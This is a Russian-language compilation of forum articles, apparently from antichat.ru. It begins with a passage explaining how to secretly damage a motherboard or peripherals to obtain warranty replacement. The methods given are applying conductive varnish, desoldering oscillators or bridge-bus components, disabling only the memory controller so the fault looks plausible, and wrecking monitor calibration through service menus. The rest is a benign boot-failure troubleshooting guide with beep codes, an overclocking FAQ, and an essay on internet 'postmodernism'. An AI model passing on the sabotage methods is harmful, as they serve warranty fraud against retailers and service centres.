С мамкой хакер может делать все, что душе угодно, не особо боясь потерять гарантию. Причина проста до безобразия. Осмотреть всю печатную плату на предмет микроповреждений, отсутствия деталей и прочих хитрых модификаций очень сложно из‑за ее больших размеров. Конечно же, платы осматривают, но не под микроскопом и без каталога находящихся на ней элементов. На это способны только некоторые некрофилы с Митинского рынка и аналогичные деятели из мелких компьютерных фирм, которые теряют на этом свои деньги. В большинстве крупных фирм на это просто нет времени. Поэтому если на плате отсутствуют явные механические повреждения, то злодей может смело сдавать ее в гарантию. Програм- мно убить мать таким образом, чтобы можно было «откатить» неисправность, очень сложно. Порчей БИОСа тут не обойдется, так как это элементарно фиксится. Остается только токопроводящий лак. Его обычно наносят около жизненно важных узлов, например, возле БИОСа, тактовых генераторов, а также на нераспаянные участки платы. Безусловно, самым надежным и менее палевным способом является снятие некоторых элементов, но этот способ является обратимым только с оговоркой на хорошее паяльное оборудование и прямые руки, ведь поставить CMD-элемент на место намного сложнее, чем его снять.
Необратимые способы
Из необратимых стоит выделить только демонтаж важных деталей, необходимых для работы платы. Лучше всего подходят различные кварцевые генераторы и элементы, стоящие на внутренней шине между мостами. Их отсутствие обеспечит полную неработоспособность платы. Впрочем, пьезоэлектрошок тоже подойдет. Чтобы избежать излишней подозрительности, злодей может попробовать убить какую‑либо отдельно взятую часть — например, контроллер оперативной памяти. Эта поломка будет выглядеть значительно правдоподобнее — плата просто будет орать благим матом, требуя вставить оперативную память. Ведь полная смерть у матерей наступает не так часто.
Периферия
С убийством периферии все зависит отконкретной ситуации. Например, многие принтеры и большинство ЭЛТ-мониторов имеют специальные сервисные режимы, из‑за которых можно изуродовать девайс. В мониторах при помощи этих режимов
злодей может так исковеркать изображение, что вернуть исходные настройки будет практически невозможно. Эти настройки делаются на заводе при участии сложного оборудования, в домашних условиях, да и в условиях мелкого сервис-центра этого не исправить. Вход в это меню выполняется путем нажатия определенной комбинации кнопок, но для всех мониторов она разная. На некоторых мониторах, например Sony, ее вообще нет, и вход в сервисное меню выполняется через специальный data‑кабель с компьютера. С принтерами ситуация похожая, однако в бытовых дешевых принтерах подобные функции присутствуют редко, в основном это возможно на дорогих производительных моделях, предназначенных для офисов. То же самое относится и к другим девайсам, например к аппаратным dial up модемам. В них все настройки хранятся в памяти модема, с их помощью его можно привести в полностью неработоспособное состояние. Дело в том, что их настройки позволяют полностью изменить реакцию на линию связи, в определенных ситуациях модем просто перестанет видеть линию. Однако лечится это обычным возвратом к заводским настройкам.
Выводы
Как видишь, злодей может без проблем угробить любой девайс. Большинство современных девайсов имеют свои внутренние микропрограммы, и если хорошо изучить подробности их конфигурирования и работы, то можно успешно эмулировать многие неисправности. Не стоит забывать, что в сервис-центрах также сидят грамотные люди, которых порой не так просто обдурить.

0

23

Что делать, если не грузится комп?

Автор статьи - -=lebed=- с forum.antichat.ru

[intro]

Мне надоело уже порядком отвечать на те или иные вопросы почему не грузится компьютер, поэтому я решил написать эту статью и собрать наиболее полную коллекцию причин и способов их устранения. Статья затрагивает в основном проблемы железа, т.е. когда комп не грузится совсем из-за неисправности компонентов, а не по причине неполадок ОС или проблем с загрузчиком, основана на личном 10-ти летнем опыте.

[1. Компьютер "не заводится" совсем!]

Т.е. при подаче питания не происходит ничего совсем! (ни стартуют куллеры, не горят светодиоды, отсутствует звук в динамике.)
Устранение:
Как бы не было странным, я советую проверить напряжение 220в на подходе к БП. Бывают случаи банального плохого контакта штепселей до БП, выбитого автомата из-за включенного чайника и т.д. Т.е. обязательно убедитесь тестером что на штепселе, который вставляется в БП есть напряжение 220в. (Крайние контакты - ноль и фаза, средний - земля). На современных БП есть выключатель, проверьте так же и его, редко но бывает, и на нём пропадает контакт, либо он случайно отключен.
Далее, если с питанием всё ок, открываем системник, если есть светодиод на материнке и он горит - убеждаемся что питание приходит на плату с БП.
Потом обращаем внимание на кнопку, которая должна замкнуть контакты на материнке и запустить БП. А точнее отсоединяем её и пробуем перемкнуть контакты отвёрткой прямо на материнке.(маркируются PWRSW) Кнопки как правило выходят из строя редко, но бывают западают.
Если с кнопкой всё впорядке, а комп так же не подаёт признаков жизни, то я сразу советую попробовать подставить другой БП, потому как с большой вероятностью можно утвержать что проблема в нём, при этом обязательно советую отключить все дисковые устройства.
Если всё заработало, подсоединяем (по 1 шт.) отключенные ранее устройства, выявляя проблемное. Если всё вместе работает, то либо меняем БП на новый, либо ремонтируем неисправный (обычно горят транзисторы, диоды на входе БП, тут на ачате была статья о ремонте БП)

[2. Компьютер пытается "завестись".]

Т.е. при подаче питания сразу происходит последующее отключение питания. Куллеры начинают вращатся и тут же перестают.
Возможные причины:
а) Напряжение просаживается по каким либо линиям питания (перегрузка по току) и срабатывает защита.
Вполне возможно какое либо из устройств неисправно и просаживает питание либо перегружает шины данных по току. (Недавний мой пример - cгоревшая видеокарта 8800GT - перегрузка по шине PCI-E либо по дополн. линиям питания.)
В этом случае в современных БП срабатывает защита от перегрузки и происходит отключение питания.
б) Перекос напряжений, допустим +12,8в и -11,2в или +5,5в и -4,5в (Это может быть следствие просадки - как правило наблюдается у дешовых китайских БП).
Устранение:
- Выявляем устройство причину: Отключаем все возможные устройства: HDD, CD/DVD-приводы, платы расширения, USB-хабы (даже воткнутая неисправная флешка может быть причиной). Оставляем только материнку, проц, память. Если не помогло, то снимаем и память. Если результата нет, вынимаем материнскую плату и пробуем запустить на столе, вне корпуса. Если запуск произошёл, то скорее всего на материнке есть микротрешина (часто возникает на материнках для процев AMD в районе процессорного разъёма). Как правило эту неисправность сложно устранить в домашних условиях, можно попробовать лишь погреть материнку, предварительно сняв проц, горячим воздухом паяльной станции. Кардинальное решение - замена материнки.
- Если результата нет - внимательно осмотрите плату на предмет вспухших конденсаторов обвязки (круглые бочёнки). Вывает что электролит выкипает (высыхает) и в конденсаторе сильно возрастает ток утечки (начинает работать как резистор) тем самым просаживая напряжение и не обеспечивая достаточной фильтрации. Решение - замена конденсаторов на аналогичные (можно взять с другой неисправной платы). Аккуратно - не перепутайте + и - при установке.
- Если внешне всё в порядке, то остаётся 3 возможных неисправных компонента: БП, Проц, Материнская плата.
В этом случае, я так же советую попробовать подставить другой БП, если всё заработает, то значит проблема в нём (скорее всего в выходных цепях БП), либо меняем БП, либо ремонтируем.
- Не помогло с рабочим БП - меняем проц на заведомо рабочий. (за свой 10-ти летний опыт я так и не видел сгоревшего процессора - наверно везло ;-)
- Не помогло - не исправна материнская плата - меняем.
Т.е. из четырёх, самых главных компонентов, вероятный порядок выхода из строя следующий:
1. БП (Очень часто используется дешовый некачественный китайский БП)
2. Материнская плата.
3. Память.
4. Процессор.
Тут отдельно остановлюсь на старых БП - там на входе был попросту предохранитель (иногда впаянный) который при увеличении нагрузки попросту сгорал. В этом случае перед установкой нового - так же следует найти причину (КЗ, либо перегрузки). Были случаи выхода из строя БП из-за неисправного (сгоревшего) HDD например, причём из-за него сгорело аж два БП (я так понял не имеющих защиты), так что будте аккуратнее.
в) Перегрев процессора.
Некоторые процессоры не запускаются без охлаждающего радиатора совсем (часто от AMD). Т.е. причина отскочившая защёлка радиатора, либо одного! крепления к материнской палате (был реальный случай), либо плохой термоконтакт с ним.
Устранение:
Открываем системник, проверяем радиатор, ставим на его место, если отошёл, при необходимости используем термопасту.
Вообще перегрев (не достаточное охлаждение - это отдельная тема) проверьте чтоб все радиаторы были на месте (южный и северный мост).
г) Вы используете мощную видеокарту (а может и две в SLI или Cross) и она(и) требуют отдельной(ых) линии(й) питания 12в. В этом случае БП может попросту не вытягивать эту нагрузку (потребление современных видеокарт доходит до 200Вт.) Если Вы счастливый владелец двух видюх, то наверняка Вы позаботились о мощном БП >650Вт. и этой проблемы у Вас быть не должно (такие БП имеют отдельные линии питания для видеокарт и я надеюсь Вы использовали их верно). Если у Вас одна видеокарта с доп. питанием и обычный БП (400-430Вт.) то видеокарту следует запитать двумя! свободными линиями питания (отдельные провода из БП с обычным плоским разъёмом на конце) используя специальный переходник (поставляется с видюхой). На эти линии не рекомендуется подключать параллельно ещё что-либо (HDD, CD/DVD и др.)
д) Плохой контакт на разъёме питания материнской платы (20pin, 24pin). Было и такое: Отверстия разъёма "мамы" БП были большего диаметра чем штырьки "папы" на материнке, вследствии чего из-за плохого контакта начал отгорать разъём (почернел). Неисправности такого плана, как правило выявляются ударом по системному блоку. А так же можно заметить по просадке напряжения (сопротивление в месте плохого контакта может достигать нескольких ОМ).
Устранение: Отсоединяем разъём, маленьким шилом деформируем контакты "мамы" разъёма БП, уменьшая диаметр, превращая окружность в например в пи... т.е. элипс ну вообщем вы поняли проблему Для наглядности вот так: O -> ()

[3. Заводится, нет звуков, чёрный экран]

- Тут мы уже можем померять напряжения БП тестером и убедивщись в отклонениях (или их отсутствии) более 10-15% по линиям +5В,-5В, +12В, -12В начинаем выявлять причину просадки напряжения - отсоединяем все устройства и т.д. т.е. алгоритм действий такой же как и во 2 пункте.
Вообще разница этих пунктов только в том, что один БП имеет защиту от перегрузки, другой нет, либо один БП более мощный и порог срабатывания защиты другой. Т.е. БП запускается, а напряжения для работы компонентов, устройств всё равно недостаточно из-за просадки.
- Неверные установки биос. Часто происходит, если вы пытались разогнать систему (проц, память, шины и т.д) и в итоге не может отработать даже POST (процедура самодиагностики).
Устранение: открываем системник, вытаскиваем батарейку (обычно кругляк размером с 2 рубля и напряжением 3,3В.) Перемыкаем контакты к которым цепляется батарейка на материнской плате отвёрткой на несколько секунд, тем самым сбрасывая установки BIOS в заводские. Пробуем запустить без батарейки. Потом ставим батарейку на место и пробуем грузится. Проверьте напряжение батарейки. Были случаи не запуска компа из-за севшей (осталось 1,7в) батарейки.

[4. Отрабатывает процедура POST (самодиагностики).]

Т.е. динамик компа начинает издавать некоторые звуки, хотя вывода на экран может и не быть.
Сигналы для разных BIOS и материнских плат могут отличаться, поэтому сначала смотрим по ману от материнки какой у нас BIOS, а потом смотрим расшифровку сигналов, приведу некоторые из популярных:
AMI BIOS:

Код:
2к Ошибка четности ОЗУ
3к Ошибка в первых 64 кБ ОЗУ
4к Неисправность системного таймера
5к Неисправность CPU (процессора)
6к Накрылся контроллер клавиатуры
7к Накрылась системная плата
8к Проблемы с памятью видеокарты
9к Ошибка контрольной суммы BIOS
10к Невозможна запись в CMOS
11к Неисправен кэш, расположенный на системной плате
1д+1к Проблемы с блоком питания
1д+2к Проблемы с видеокартой
1д+3к То же
1д+8к Не подключен монитор

AWARD BIOS:

Код:
2к Мелкие ошибки (как правило это проблемы в CMOS Setup или с системной платой.)
3д Ошибка контроллера клавиатуры
1д+1к Ошибки в ОЗУ
1д+2к Ошибка видеокарты
1д+3к Ошибка инициализации клавиатуры
1д+9к Ошибка при чтении из ПЗУ
к, повторяющийся Неисправен блок питания
д, повторяющийся Проблемы с ОЗУ
непрерывный Неисправен блок питания

к - короткий сигнал.
д - длинный.
На практике не всегда вообщем-то стоит доверять этим сигналам, потому как одновременно может быть две или более неисправности и тут всё зависит от того как функционирует процедура POST, т.е. какую неисправность она обнаружит сначала.

[5. Отрабатывает процедура POST - один короткий сигнал - всё ок, но негрузится]

Даже при одном коротком сигнале - (всё работает нормально) компьютер может не грузится.
Как правило это может произойти из-за не верных установок в BIOS.
Устранение: заходим в BIOS возвращаем установки обратно (если меняли перед этим) либо сбрасываем все установки в заводские (по-умолчанию).
На современных платах от Asus есть система интеллектуального разгона, которая может не совсем верно работать (выставлять напряжения и частоты) в режиме auto. Поэтому рекомендуется отключить её, выставив режимы в BIOS либо manual либо disable. Иногда стоит задать явные частоты памяти, процессора, шины и т.д. а не надеятся на режим auto. Пример: оперативная память определяющаяся как работающая на частоте 800 но на самом деле при этом не корректно работает и при этом нормально работающаяя на 667. Вообщем задавая явные верные установки, а не auto Вы увеличивайте шансы на успешную загрузку и дальнейшую стабильную работу системы.

[6. Проблемы загрузки ОC]

Остановлюсь вкраце и на этом, потому как это уже в большей степени не проблемы железа (исключение не исправный HDD, либо другое устройство загрузки).
- не исправный HDD (не определяется и т.п.)
Устранение: Грузимся с Live-CD - тестируем HDD (имхо лучшая прога MHDD4) выявляем неисправность, обычно либо контроллер, либо поверхность блинов. Как правило решение для устранения неисправности - замена HDD на исправный. Если ценна инфа на винте - можно попробовать отдать на восстановление в специализированную фирму.
- отсутсвует загрузчик, повреждена MBR и т.д.
Устранение: Грузимся с установочного диска ОС (для винды выполняем fixmbr, fixboot если стандартный загрузчик).
Если используется не стандартный мультизагрузчик - ставим его заного.
- не грузится ОС, загрузчик на месте. Это уже проблемы самой Операционной системы (повреждённые системные файлы, файлы драйверов, проблемные драйвера, вирусы и т.д.)
Устранение: Восстановление системы (различные способы), как кардинальный способ - загрузка с CD(DVD) и переустановка ОС на чистый переразбитый и отформатированный диск.

[заключение]

Конечно тут описаны не все причины проблемы не запуска компьютера, но это наиболее частые и встречаемые мной на практике, статья возможно будет дополнена и доработана. Главное определён алгоритм действий. Иногда бывает обидно разобрать весь комп и только потом выявить причину плохого контакта в розетке. Не тратьте своё время. Начинайте всегда сначала: проверьте напряжение питания (можно обойтись и без тестера, подключив к примеру, монитор к сетевому кабелю 220В, которым питается системник. Не забывайте про доп. питание проца на материнцкой плате (4 или 8 pin), дополн. питание видеокарт (6pin). Не перегружайте линии питания (запитывайте разные устройства с разных линий). Плохое питание - как правило основной источник большинства проблем с запуском компьютера, на втором месте перегрев (плохое охлаждение), далее неисправность устройств (HDD, Видеокарта, CD/DVD-приводы, память, материнка и т.д.)
P.S. спец. для Ачата из личного опыта.

0

24

Faq начинающим оверклокерам.

Автор статьи - Folc с forum.antichat.ru

В: Что такое разгон (видеокарты, процессора), и для чего он нужен?

О: Разгон видеокарты, процессора, оперативной памяти производится с целью повышения производительности данных компонентов компьютера. Осуществляется путём повышения частот, увеличением вольтажа, понижением таймингов, увеличением множителей.

В: Какое железо лучше гонится?

О: Все зависит от конфигурации и производителя ваших комплектующих. Есть комплектующие, которые производятся специально для разгона (в основном мат. платы), есть рядовое железо, но его потенциал ещё не раскрыт. Мой первый компьютер процессор, которого я смог разогнать был Pentium 200 MMX (до 233), так что дата производства железа ни как не влияет на наши задачи.

В: Какое железо лучше не гнать?

О: Чаще относится в видеокартам: Внимание! Если ваша видеокарта относится к категории NoName (т.е. производитель не известен), или на ней стоит пассивное охлаждение (т.е. стоит радиатор без вентилятора), то лучше с разгоном не замарачиваться. NoName быстро сгорают. Ну а пассивное охлаждение необходимо доработать (прикрутить вентилятор).

В: Почему я должен разгонять? Почему инженеры не разогнали до меня?

О: Уменьшение производительности влияет на прочность железа. Так же здесь маркетинговые причины, создание более быстрого железа, чем необходимо было.

В: Я подумал, и решил разогнать компьютер. Что дальше?

О: Первым делом нам нужно подготовится, а потом гнать. Прежде чем приступить к разгону зайдите на сайт производителя вашей видеокарты и материнской платы и проверьте наличие обновлений. Если такие присутствуют - внимательно ознакомьтесь с введёнными изменениями. Конечно, чаще, разработчики исправляют ошибки прошлых версий BIOS и добавляют новые опции. Но как оказывается на практике не всегда новый BIOS способствует хорошему разгону. В новой версии может быть заблокирована функция увеличения вольтажа (или разблокирована), может быть отключена функция изменения таймингов оперативной памяти, установлены какие либо тормоза и т.д. Руководство по обновлению ваших BIOS, будет лежать на сайте производителя ваших железок, поэтому мы не будем на этом задерживаться.

В: Как правильно разогнать видеокарту?

О: Постепенно повышайте частоту ядра с шагом в 10 МГц. После каждого повышения запускайте, какую нибуть игру, которая требует мощную видеокарту, и гоняйте её в течении 5 минут. Если за этот период компьютер не зависал, и не наблюдались артефакты (всякого рода мерцания, искажения картинки) можно ещё повышать частоты. Вместо игры советую лучше использовать современные программы для тестирования видеокарт (3DMark), которые по окончанию тестирования будут ещё нам показывать и прирост в производительности видеокарты. После того как компьютер зависнет, или появятся артефакты вернитесь на предыдущую частоту и протестируйте ещё раз. После разгона процессора переходите к разгону памяти. Аналогично повышайте частоты, и проводите тестирование как в случаи с процессором. По окончанию разгона проведите длительный тест в течении 30 мин.

В: Какими программами пользоваться?

О: Рекомендую использовать программу RivaTuner. Она поддерживает как видеокарты NVIDIA, так и ATI.

В: Что ещё интересного?

О: На видеокартах NVIDIA начиная с линейки FX есть разгон при помощи драйвера видеокарты. В драйверах позднее версии 95.XX эта функция удалена. Что радует: есть функция автоматического определения оптимальных частот.

В: Почему у меня этой функции нет?

О: Убедитесь, что у вас стоит драйвер, версия которого не выше 95.ХХ. Так же добавьте в реестр параметр CoolBits (DWORD), значение 2, путь HKLM\Software\NVIDIA Corporation\Global\NVTweak

В: Так с видеокартами чуть разобрались, а что на счёт процессора, как его разогнать?

О: На примере AMD Sempron 2400+ (реальная 1666 МГц)
1. Идём в BIOS . Для этого во время загрузки компьютера нажимаем и удерживаем клавишу DELETE.
2. Заходим в Bios Features, ищем там CPU Clock со значением = 166, постепенно повышаем его с шагом равным 3-м. Реальная частота при этом каждый раз будет повышаться на 30МГц.
3. После жмём Save & Exit Setup.
4. Теперь на надо как можно больше нагрузить процессор для тестирования. Если появится нестабильность в работе, зависания - значить частоту необходимо вернуть на ступень ниже.

В: Чем я рискую?

О : Риск один - спалить ядро. Но современное железо настолько защищено от перегрева, что этот риск сводится практически к нулю. Следите за температурой ядра, тогда у вас нет практически шансов его спалить, нормальной температурой для процессоров Sempron 2400 является температура равная 60 градусам. Для вашего процессора вы сможете найти информацию в поисковиках.

В: Как правильно организовать охлаждение?

О: Как и тюнингованному мотору требуется новая тормозная система, так и разогнанному компьютеру требуется новое охлаждение. Пара новых куллеров установленных в системном блоке поможет вашей стандартной системе охлаждения справится с повышением температуры. Воздух в системном блоке циркулирует снизу вверх, учтите этот фактор при установке новых куллеров.

0

25

Хакерский постмодернизм

Автор статьи - Cthulchu с forum.antichat.ru

Неудержался. По моему, статья очень хорошая, стоит к тому, что бы ее прочли. Детям читать бесполезно (зная, что их тут как грязи).
И так, статья:
---
Итак вначале от себя-

попрошу сразу закрыть страничку с этой темой тех,
кто не читает до конца большие статьи, и
тех, кто дает коментарии типо кг/ам, ниасилил, афтар жжот,
и прочую мутотень.Ибо никто вас не заставляет читать её,
а читать не полностью просто не имеет смысла.
Кто-то прочитав статью скажет "Очень уныло" или "Что не не верится" и.т.д
У каждого сугобо личное мнение, и переубеждать вас никто не будет.
Но от себя могу сказать- "Почитай, хорошо написанно.Очень хорошо."

- А что, она работает? – Удивилась девочка, ощупывая гильотину.
- Работает всем на радость, вот только радость эта горькая, - сказал Эко.
Стивен Эриксон «Оттенки дьявольской скуки».

Тема у нас сегодня несколько необычная, что-то вроде «писатель и самоубийство» или «воровство как акт постпанковой диалектической культуры, нашедшей своё отражение в киберпанковой реальности современной России». Ну в общем хреновая у нас тема, да к тому же опасная как боевой топор викингов, которым решил побриться автор. Так и головы лишиться можно. Но не всё ж вам на форумах выклянчивать «спецов» ломануть почту любимой девушки (даю совет от себя: заломайте саму девушку, ха-ха-ха), учиться писать троянов, а так же выискивать баги в популярных программах. Пора немного и мозгами пошевелить, чтобы понять, где вы, когда вы и зачем вы. Преисполненный глубокого снобизма, я смело, как Анна Каренина, прыгаю под локомотив вашего мышления: современный интернет продукт вторичной пользы, опасный и требующий немедленной реструктуризации, а лучше государственного контроля с узаконенной смертной казнью.

Что есть по сути интернет? В первом приближении – место, где располагается, зарождается, распространяется, воспринимается, осознаётся информация, которой так много, что обыватель не в состоянии её полностью осмыслить и приходит к ошибочному выводу: «Всё уже написано, сыграно, сделано и нам остаётся лишь перерабатывать информацию созданную либо предыдущими поколениями, либо гениями-одиночками». С одной стороны то понятно, что легче воспользоваться новой версией WWWHack или переписать уже созданного Трояна (ох, чувствую я, сейчас ко мне домой начнут названивать компетентные органы) или даже скачать заплатку, патч, обновление, не разбираясь самостоятельно в проблеме. Возьмём, к примеру статью, написать которую я планирую уже год. Называется она «Как написать статью». Цитата (в духе постмодернистского самоплагиата): «Вы придумали новую статью? Блестяще! Теперь наберите её в яндексе, скачайте с неприметного ресурса, перепишите с нуля и выдайте за свою. Потому что всё, что вы придумали, за редчайшим исключением (которое следует расценивать как золото, найденное в канализации – не могу не плюнуть в лицо сетевым эстетам и скажу, что у меня таких статей аж на 10 % от всех работ наберётся), давно написано, разобрано по полочкам, украдено и ещё раз переписано. Остаётся только добавить свою лепту в тепловое нагревание вселенной и информационный хаос. Впрочем, может и у вас появится последователь, который совместит вашу статью с диссертацией по молекулярным фракталам и родит хоть что-то относительно новое под этой безумной луной».

Интернетовский плагиат – это ещё бог с ним, пусть замшелые профессионалы с ним борются: «Я, мля, эстет! Какого чёрта вы опубликовали мою статью о новой версии антивируса К у себя на портале! Вы позора не вынесите, если ссылку на мою домашнюю страничку «Я и моя странная кошка» не сделаете. Горите в аду!» Гораздо страшнее, когда эта зараза проникает в мозг и порождает самоплагиат. (Тут автор ушёл в подпространственные рассуждения о литературе вообще и месте современного человека в иерархии космологических сил в частности, но мощное телепатическое вмешательство редакции повернуло его на правильный путь.)

<…>Возьмём таких писателей как Лукьяненко, Донцова, Пелевин. Не во всех романах (Иисус из Назарета упаси меня такое сказать), но во многих из декораций только имена героев поменялись. Словно под копирку писали. Не говоря уже о том, что большинство героев большинства произведений мыслят одинаково и точно так же как и автор. Оставим литературу, я, мля, не эстет и не критик. Посмотрим на софт. Вы видели Office 12? Я видел. Аккуратно поменяли дизайн и оставили все те же функции. Впрочем, чего ещё нового там придумать и я не знаю. Но возьмите Windows Vista! Так грамотно своровать идеи у Linux и Mac OS мог только Гейтс! Там же практического ничего нового нет, всё, до последней строчки кода, либо существует в других системах, либо давно выпущено сторонними разработчиками. И при этом они уже пять лет делают эту систему, выкинув действительно свой проект Windows Blackcomb-Vienna за орбиту 2010 года. Или вот с пеной у рта ожидаемая PS3 (каюсь, даже я коплю на неё денежки, прельстившись блю-рей приводом). Не помню сколько там у неё терафлопс производительности, этакий маленький суперкомпьютер. Ну реализовали они там технологию 1999 года, запихав восемь ядер. Но это устаревшая технология! Она даёт чисто физический прирост производительности, обеспечивая грамотную прорисовку и фантастическую графику. И всё. На AI в новых играх не надейтесь. Да хоть тысячу процессоров они туда поставят и сделают виртуальную реальность – противник всё равно не додумается сменить оружие, обойти вас сзади и подстроить хитроумную ловушку. Зато игроделы будут развивать он-лайн гейминг. Ну да, чего тратиться, когда можно человека поставить против человека и сэкономить пару миллиардов на разработку удовлетворительного геймплея.

Я не знаю, что это, жадность или лень. Всё ж проще двигать давно апробированные старые технологии, чем развивать новые. Примеров можно привести огромное количество, но по большому ИМХО не малую роль в отупении сознания сыграл интернет. Чёрт, столько информации! И всё бесплатно. Зачем нам выискивать какие-то проги, читать какие-то обзоры, когда можно скачать из P2P вторую бету Висты и наслаждаться вместе с тысячами других дурачков.

И всё это – постмодернизм.

Я не роняю крокодильи слёзы по поводу нарушения авторских прав или из-за прочей фигни. Просто мне кажется, что наша жизнь могла бы быть чуточку лучше. Хотя бы не столь походить на киберпанк, как это происходит сейчас. Знаете, если вы хотите писать компьютерные статьи (И если вы не из племени полубогов профессионалов, которые с маниакальным упорством описывают выход «новых» материнских плат и версий программ), то вам следует отказаться от интернета. Изучить какую-либо систему можно, лишь оказавшись вне её пределов, и именно так была рождена концепция Web 2.0.

Впрочем, это всё частности, на практике пользователи имеют дела с другими последствиями интернетовского постмодернизма. Поясню цитатой (автор смеётся и делает ещё одну затяжку): «Реклама и спонсорство всегда были замешены на использовании образного ряда для создания ассоциативной связи товаров с позитивными культурными или социальными событиями. Брэндинг же образца 90-х годов замечателен тем, что все более стремится вывести эти ассоциации из разряда предметно-изобразительных средств и сделать их переживаемой, проживаемой реальностью. Иными словами, когда кроссовки ассоциируются со свободой, уверенность в своих силах - с дезодорантом, а хороший вкус - с сотовым телефоном, это только цветочки. Заветная ягодка брэндинга - добиться того, чтобы свобода ассоциировалась с кроссовками; в идеале - до такой степени, чтобы в учебниках истории вместо национально-освободительной обозначилась национально-кроссовочная борьба».

Улавливаете, к чему я клоню? Мода постмодернизма – это iPod, который давно уже перестал быть плеером и перехватил инициативу у сотовых телефонов. Давайте не будем делать хороший плеер (вспомнил, что только что писал про ай-под, заглянул в одну из статей – вы её увидите чуть позже – и увидел, что да, так и есть, я сознался в покупке 20 Gb iPoda. «Деймос©, ну ты и мудак!» - подумал я... поскольку настоящей хороший плеер iRiver – уже об этом упоминал на страницах Х и получал кучу гневных откликов, мол, фигня это, но своего мнения не изменил, так что выбирайте сами, - а Яблочники не более чем раскрученный бренд в красивой упаковке. И опять таки нам легче принять то, что мы уже и так знали. Повторяйте за мной как зомби: «Фирма Apple позволяет нам думать иначе, фирма Apple – лучшая фирма, а её продукция это то – для чего мы созданы».

Творческий поиск сменился на творческую же модернизацию. Вы думаете, почему у Microsoft менеджеров больше чем программистов – они это уловили одними из первых. Не важно содержание, важен внешний лоск. Постмодернизм здесь такой необъятный, что накрывает даже наших любимых подонков. Правильно, смысл то тот же – употребление наркотиков, сексуальные взаимоотношения, общение с друзьями и алкоголем и т. д. – но поданный в необычной обёртке: ф фас йа фтыкал, та многа букаф, асилить креатифф не в силах. Так что радуйтесь, написав «аффтор жжот» вы автоматически встали с мировыми брендами в один ряд и примкнули к многочисленным постмодернистам нашей эпохи.

А что в итоге? – спросит терпеливый читатель и получит ногой по почкам за ПМ вопрос. Нет никакого «итога», есть процесс, движение PN-порядка, который несёт в себе интеллектуальная смерть, большие затраты, компьютерный багги и прочие ужасы глобальной жизни. Да если бы не этот постмодернизм, хакеры давно бы научились шевелить собственными мозгами и правили бы миром (это я примазываюсь на всякий случай – вдруг и правду интернет захватят, так я покажу им статью и выделю себе в личное княжество какой-нибудь пиндосстан).

Претендуя на полную объективность, я, скрипя сердцем и зубами, поведаю положительную сторону постмодернизма. Безвкусный и нарочитый стёб, засилье брендов и моды, стереотипность мышления, плагиат и сознательное издевательство над необъятным космосом – это очень удобно. Дальше пойдут цитаты, уж простите, но более ёмко и лаконично я сказать и мог бы, но мне лень! (Автор хохочет, затем лезет под стол и ищет потерявшуюся плюшку.) Так вот, на поверку жизнь в постмодерне оказывается банальной пубертатной сублимацией. Поясню, в чем дело. «В определенном возрасте дети испытывают непреодолимое желание выделиться из общей массы любыми правдами и неправдами. Так называемый синдром «Доживем до понедельника» — когда «все вы толстокожие дураки», «меня, тонкого, не понимаете» и «тьфу на вас». Теперь поясню цитату, а так же расскажу, в чём она не права: стремление выделиться может проявляться в нестандартном поведение, отсюда и ноги растут у «подонков», выбор художественного языка которых целиком определяется принципом постмодернистского эпатажа. Лечение: кризисы переходного возраста проходят в основном у всех, и даже Удав сейчас приторговывает в открытом на его же сайте магазине. Моду надо эксплуатировать! Эксплуатировать согласно обратному «эффекту большинства», когда люди, чувствуя душевную опустошённость, стремятся стать «такими как все», ощутить себя частью единого могучего организма. То есть «аффтор», который к своим статьям получал комментарии «кг/ам», с гораздой больше вероятностью купит майку с надписью «Generation НАХ..» чем его более успешные коллеги. Неудачники ищут чем заполнить душевную пустоту.

Под ваши одобрительные вопли сделаю ещё одну цитату, на этот раз маргинального Даниила Шеповалова: «Меня читают одни неудачники». Именно эта фраза натолкнула меня на мысль, что постмодернизм завязан на самом себе: создаётся вторичный продукт, который пытается заполнить душевную пустоту потребителя, однако пустота эта может заполниться только собственными мысли, коих не наблюдается по причине присутствия мыслей чужих. А спрос рождает предложение! Очень удобно разграничить «удачливых» и «неудачливых»: писатель (пусть даже воинствующий графоман), программист, бизнесмен – успешен сам по себе, вне зависимости от качества продукта. А вот конечный потребителей становится в нашей системе в позу «зю», широко раздвигает ягодицы, и, ну, не важно. Вот Билл Гейтс – это успех. А системный администратор – лох последний, поскольку всё, что он производит, ограничивается головной болью у начальства и подчинённых.
Конечно, я описал гротескную больную систему, которая, тем не менее, живо соответствует нашему обществу, построенному на использовании «неудачников», потребляющих полнофункциональное дерьмо. Кстати, по поводу упомянутого графоманства. Я порылся в сети, посидел в библиотеке и собранные материалы применил к себе и всей IT-индустрии, выискивая следы этой опасной болезни. И с удивлением обнаружил, что в 90 % случаев я – больной графоман с манией величая, плохим слогом, отвратительным вкусом, дешёвым самомнением, нулевой профессиональностью и полной творческой бездарностью. Я не эстет, мля! От самоубийства карандашом прямо там, в библиотеке меня удержали оставшиеся 10 % процентов, в коих и жила настоящая сила. Ну то есть, если отбросить весь плагиат, раздутые водой статьи (гонорары у сетевых писателей маленькие – кстати, да! – а лень великая и большая и голодом её не победить), бессмысленные описания всем известных вещей и концептуальную лживую ересь (ну почти не употребляю я наркотики и не хочу, чтобы человечество вымерло – с кем же тогда трахаться), останется то, ради чего вы тратите своё время. Информация, которая позволяет людям мыслить.

И эта информация говорит, что в 90 % существующей в интернете информации не нуждаются 90 % пользователей. В интернете почти невозможно изобрести что-то новое плюс вы будете обречены на цитирование даже в «новом». Цитата (сатанинский хохот): «Эту галиматью заклеймил вождь пролетариата В. И. Ленин, отметив неуемное стремление каждой амебы оставить хоть какой-то след в жизни». А в IT так и вовсе страшно становится: все дружны как никогда. Если пишет иксбит про хороший антивирус, то секьюритилаб о нём пишет и Алекс Экслер и мальчик Вова под псевдонимом КулХакер. А то что «хороший» жрёт 90 % системных ресурсов и кричит как недорезанная свинья, да и вирусы не все ловит – это как-то побоку. Причём о западных антивирях мы тактично умолчим. Почему в сети одна единственная мысль становится одинаковой для всех? В лучшем случае появляется ровно 50 % антиподов. И никогда мы не ищем третью сторону, никогда не высказываем, что лучше, а в большинстве случаев и не формулируем такую мысль. Что лучше: яндекс или рамблер – гугл! Какая система хуже: линукс или виндоус – обе! Пользователь интернета максимум на что способен: выбрать из двух зол меньшее, но всем знакомое.

